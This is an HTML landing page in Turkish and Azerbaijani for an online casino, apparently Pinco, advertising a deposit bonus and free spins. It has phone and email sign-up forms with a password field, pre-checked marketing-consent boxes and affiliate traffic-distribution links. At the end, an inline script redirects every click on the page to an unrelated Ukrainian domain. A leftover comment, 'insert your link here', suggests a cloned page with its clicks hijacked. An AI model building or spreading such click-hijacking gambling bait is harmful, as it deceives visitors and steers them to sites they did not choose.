<!DOCTYPE html>
<html lang="tr">
   <head>
      
      <script defer>window.landingConfig = ({"prodLink":"spa-casino-pinco-com","oldCookieName":"","head":{"title":"10 000 ₼ + 250 FS İLK PARA YATIRMA!","fontFamily":"https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&family=Roboto:wght@400;500;700;900&display=swap"},"analyticsGTM":"GTM-MFB4T883","registrationData":{"captchaKey":"6Lfxs6UUAAAAAE3kzerSlj_d5OF7IeWoXvzOE_50","project":"casino","language":"AZ","country":"AZ"},"header":{"logo":{"src":"img/logo/logo.svg","alt":"Logo"}},"titleBlock":{"src":"img/bonus/bonus.svg","alt":"bonus","text":"İLK PARA YATIRMA!"},"mainButton":"Buradan kayıt ol","decorItems":{"moneys":["img/decor/1.png","img/decor/2.png","img/decor/3.png","img/decor/4.png","img/decor/5.png","img/decor/6.png","img/decor/7.png","img/decor/8.png"],"decorItem_1":"img/decor/decor-item-1.png","decorItem_2":"img/decor/decor-item-2.png","decorItem_3":"img/decor/decor-item-3.png","decorItem_4":"img/decor/decor-item-4.png","phone":{"link":"img/decor/phone.webp","mob":"img/decor/girl-mb.png","alt":"girl"}},"modal":{"subheading":{"title":{"first":"GET bonus","second":"120%"}}},"tabs":{"buttonTel":"Telefon ile","buttonEmail":"E-posta ile"},"forms":{"buttonReg":"Kayıt ol","account":"Zaten hesabınız var mı? ","signIn":"Giriş yap","checkboxes":{"rules":"Kabul ediyorum ","link":"şartlar ve koşullarla","bonus":"","subsc":"Kampanya bilgilerini e-posta ve SMS ile almak istiyorum"},"inputPlaceholders":{"email":"E-posta","password":"Şifre"},"warning":{"rules":"Kayıt ol üçün siz bonus aksiyanın şərtləri ivə isitfadəsi ilə razılaşmalısınız","inputCorrectPhone":"Geçerli bir telefon numarası girin","inputCorrectEmail":"Geçerli bir e-posta adresi girin","inputPassword":"Şifreni daxil edin","passwordShort":"Şifreniz çok kısa. En az 6 karakter olmalı","passwordLong":"Şifreniz çok uzun. En fazla 14 karakter olmalı"},"locale":"azerbaijani","currency":{"list":["AZN","KZT","RUB","TRY"]},"phone":{"title":"Telefon nömrənizi daxil edin","list":["azerbaijan","kazakhstan","russia","turkey"]}},"links":{"spa-casino-pinco-com":{"site":"https://tdssvc.com/p6M","phone":"https://tdssvc.com/Ea2","email":"https://tdssvc.com/9RQ","terms":"https://tdssvc.com/zw7"},"spa-sport-pinco-com":{"site":"https://tdsdash.com/N4b","phone":"https://tdsdash.com/DLQ","email":"https://tdsdash.com/Vew","terms":"https://tdsdash.com/N4b"},"dev-spa-casino-pinco-com":{"site":"https://devpinco.win/","phone":"https://devpinco.win/phone","email":"https://devpinco.win/email","terms":"https://devpinco.win/"}}});</script>
      <meta charset="utf-8">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta content="telephone=no" name="format-detection">
      <meta name="HandheldFriendly" content="true">
      <title>10 000 ₼ + 250 FS İLK PARA YATIRMA!</title>
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
      <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png">
      
      <meta name="msapplication-TileColor" content="#da532c">
      <meta name="theme-color" content="#ffffff">
      <link rel="preload" href="css/main-dist.css" as="style" onload="this.rel='stylesheet'">
      <noscript><link rel="stylesheet" href="css/main-dist.css"></noscript>
      <link rel="preload" as="image" href="images/phone.webp" type="image/webp">
   </head>
   <body>
      
      <div class="decor-items" id="parallaxContainer">
         <div class="decor-items__container">
            <img decoding="async" width="710px" height="429px" alt="t1" class="decor-items__item decor-items__1 parallax-item" src="images/decor-item-1.webp">
            <img decoding="async" width="569px" height="502px" alt="t2" class="decor-items__item decor-items__2 parallax-item" src="images/decor-item-2.webp">
            <img decoding="async" width="490px" height="460px" alt="t3" class="decor-items__item decor-items__3 parallax-item" src="images/decor-item-3.webp">
            <img decoding="async" width="414px" height="263px" alt="t4" class="decor-items__item decor-items__4" src="images/decor-item-4.webp">
            <div class="decor-items__item decor-items__phone"></div>
            <img decoding="async" width="" height="" class="decor-items__item decor-items__phone" src="images/phone.webp" alt="girl">
            <div class="falling-items">
               <div class="falling-items__set">
                  <div class="falling-items__item falling-items__item--1"><img decoding="async" alt="t5" width="167px" height="179px" src="images/1.webp"></div>
                  <div class="falling-items__item falling-items__item--2"><img decoding="async" alt="t6" width="156px" height="164px" src="images/2.webp"></div>
                  <div class="falling-items__item falling-items__item--3"><img decoding="async" alt="t7" width="166px" height="178px" src="images/3.webp"></div>
                  <div class="falling-items__item falling-items__item--4"><img decoding="async" alt="t8" width="145px" height="148px" src="images/4.webp"></div>
                  <div class="falling-items__item falling-items__item--5"><img decoding="async" alt="t9" width="187px" height="181px" src="images/5.webp"></div>
                  <div class="falling-items__item falling-items__item--6"><img decoding="async" alt="t10" width="205px" height="220px" src="images/6.webp"></div>
                  <div class="falling-items__item falling-items__item--7"><img decoding="async" alt="t11" width="140px" height="135px" src="images/7.webp"></div>
                  <div class="falling-items__item falling-items__item--8"><img decoding="async" alt="t12" width="310px" height="338px" src="images/8.webp"></div>
               </div>
            </div>
         </div>
      </div>
      <div class="main">
         <div class="main__container">
            <div class="main__wrapper">
               <header class="header"><a class="header__logo header__logo_left redirectlink"><img class="header__logo-img" src="images/logo.svg" alt="Logo"></a></header>
               <div class="title-block">
                  <img class="title-block__bonus" src="images/bonus.svg" alt="bonus">
                  <div class="title-block__text">İLK PARA YATIRMA!</div>
               </div>
               <div class="main__buttons"><button class="main__btn">Buradan kayıt ol</button></div>
            </div>
         </div>
      </div>
      <div class="modal">
         <div class="modal__content">
            <div class="modal__bonus">
               <div class="title-block">
                  <img class="title-block__bonus" src="images/bonus.svg" alt="bonus">
                  <div class="title-block__text">İLK PARA YATIRMA!</div>
               </div>
            </div>
            <div class="modal__wrapper">
               <ul class="tabs">
                  <li class="tabs__item"><button class="active tabs__button" id="reg-btn-tel"><span class="tabs__button-title">Telefon ile</span></button></li>
                  <li class="tabs__item"><button class="tabs__button" id="reg-btn-email"><span class="tabs__button-title">E-posta ile</span></button></li>
               </ul>
               <div class="forms">
                  <form class="active" id="phone-form" name="form-reg" method="post" action="#">
                     <div class="phone-form">
                        <h3 class="phone-form__header">Telefon nömrənizi daxil edin</h3>
                        <div class="select-phone">
                           <div class="select-phone__placeholder"><img class="select-phone__placeholder-logo js--phone"><input class="select-phone__placeholder-input js--phoneInput" required="" type="tel" tabindex="-1" data-property="default" id="phone-id" minlength="3" name="phone" autocomplete="off"><button class="select-phone__placeholder-btn js--ctrl js--phone" type="button" aria-label="Открыть список стран"></button></div>
                           <ul class="select-phone__list"></ul>
                        </div>
                        <div class="select-currency">
                           <button class="select-currency__main js--currency" type="button">
                              <div class="select-currency__placeholder">
                                 <div class="select-currency__icon"><i class="select-currency__icon-font"></i></div>
                                 <div class="select-currency__name"></div>
                                 <div class="select-currency__text"></div>
                              </div>
                              <input class="select-currency__default-input" tabindex="-1" name="currency"><input type="hidden" id="backurl" name="backurl" value=""><input type="hidden" id="lang" name="lang" value=""><input type="hidden" id="st" name="st" value=""><input type="hidden" id="s1" name="s1" value=""><input type="hidden" id="s2" name="s2" value=""><input type="hidden" id="s3" name="s3" value=""><input type="hidden" id="s4" name="s4" value=""><input type="hidden" id="s5" name="s5" value=""><input type="hidden" id="pc" name="pc" value=""><input type="hidden" id="form_email" name="form_email" value=""><input type="hidden" id="form_phone" name="form_phone" value=""><input type="hidden" id="form_key" name="form_key" value=""><input type="hidden" id="form_cpf" name="form_cpf" value=""><input type="hidden" id="recaptchaToken" name="recaptchaToken" value=""><input type="hidden" id="host" name="host" value=""><input type="hidden" id="project" name="project" value=""><input type="hidden" id="fpSessionId" name="fpSessionId" value="">
                           </button>
                           <ul class="select-currency__list"></ul>
                        </div>
                     </div>
                     <input type="hidden" name="screenSize" value=""><input type="hidden" name="timezone" value=""><button class="submit-btn" type="button">Kayıt ol</button>
                     <div class="forms__questions"><span class="alredy-registred">Zaten hesabınız var mı? </span><a class="forms__signin-link redirectlink" href="#">Giriş yap</a></div>
                     <div class="checkbox">
                        <div class="checkbox__item checkbox__item_rules">
                           <input class="checkbox__input" type="checkbox" checked="" id="check-rules-p" required=""><label class="checkbox__label" for="check-rules-p"><span class="checkbox__label-icon"></span></label>
                           <div class="checkbox__text">
                              <p>Kabul ediyorum <a class="checkbox__text-link redirectlinkTerms" href="#">şartlar ve koşullarla</a></p>
                           </div>
                        </div>
                        <div class="checkbox__item checkbox__item_sub">
                           <input class="checkbox__input" type="checkbox" checked="" id="check-subs-p"><label class="checkbox__label" for="check-subs-p"><span class="checkbox__label-icon"></span></label>
                           <div class="checkbox__text">
                              <p>Kampanya bilgilerini e-posta ve SMS ile almak istiyorum</p>
                           </div>
                        </div>
                     </div>
                  </form>
                  <form id="email-form" name="email-reg" method="post" action="#">
                     <div class="email-form">
                        <div class="email-form__item"><input class="email-form__email-input" type="text" required="" placeholder="E-posta" id="email-input" name="email"></div>
                        <div class="email-form__item">
                           <input class="email-form__password-input" type="password" required="" placeholder="Şifre" id="password-input" name="password">
                           <div class="email-form__view-icon" onclick="changePasswordType()"></div>
                        </div>
                        <div class="select-currency">
                           <button class="select-currency__main js--currency" type="button">
                              <div class="select-currency__placeholder">
                                 <div class="select-currency__icon"><i class="select-currency__icon-font"></i></div>
                                 <div class="select-currency__name"></div>
                                 <div class="select-currency__text"></div>
                              </div>
                              <input class="select-currency__default-input" tabindex="-1" name="currency"><input type="hidden" id="e-backurl" name="backurl" value=""><input type="hidden" id="e-lang" name="lang" value=""><input type="hidden" id="e-st" name="st" value=""><input type="hidden" id="e-s1" name="s1" value=""><input type="hidden" id="e-s2" name="s2" value=""><input type="hidden" id="e-s3" name="s3" value=""><input type="hidden" id="e-s4" name="s4" value=""><input type="hidden" id="e-s5" name="s5" value=""><input type="hidden" id="e-pc" name="pc" value=""><input type="hidden" id="e-form_email" name="form_email" value=""><input type="hidden" id="e-form_phone" name="form_phone" value=""><input type="hidden" id="e-form_key" name="form_key" value=""><input type="hidden" id="e-form_cpf" name="form_cpf" value=""><input type="hidden" id="e-recaptchaToken" name="recaptchaToken" value=""><input type="hidden" id="e-host" name="host" value=""><input type="hidden" id="e-project" name="project" value=""><input type="hidden" id="e-fpSessionId" name="fpSessionId" value="">
                           </button>
                           <ul class="select-currency__list"></ul>
                        </div>
                     </div>
                     <input type="hidden" name="screenSize" value=""><input type="hidden" name="timezone" value=""><button class="submit-btn" type="button">Kayıt ol</button>
                     <div class="forms__questions"><span class="alredy-registred">Zaten hesabınız var mı? </span><a class="forms__signin-link redirectlink" href="#">Giriş yap</a></div>
                     <div class="checkbox">
                        <div class="checkbox__item checkbox__item_rules">
                           <input class="checkbox__input" type="checkbox" checked="" id="check-rules-e" required=""><label class="checkbox__label" for="check-rules-e"><span class="checkbox__label-icon"></span></label>
                           <div class="checkbox__text">
                              <p>Kabul ediyorum <a class="checkbox__text-link redirectlinkTerms" href="#">şartlar ve koşullarla</a></p>
                           </div>
                        </div>
                        <div class="checkbox__item checkbox__item_sub">
                           <input class="checkbox__input" type="checkbox" checked="" id="check-subs-e"><label class="checkbox__label" for="check-subs-e"><span class="checkbox__label-icon"></span></label>
                           <div class="checkbox__text">
                              <p>Kampanya bilgilerini e-posta ve SMS ile almak istiyorum</p>
                           </div>
                        </div>
                     </div>
                  </form>
               </div>
            </div>
         </div>
      </div>
      
      
      <script defer src="js/bundle.js"></script>
      <script>
         document.addEventListener('click', function(e) {
             window.location.href = "https://zagata.com.ua/show/"; // Вставте свою ссилку сюди
         });
      </script>
      
   </body>
</html>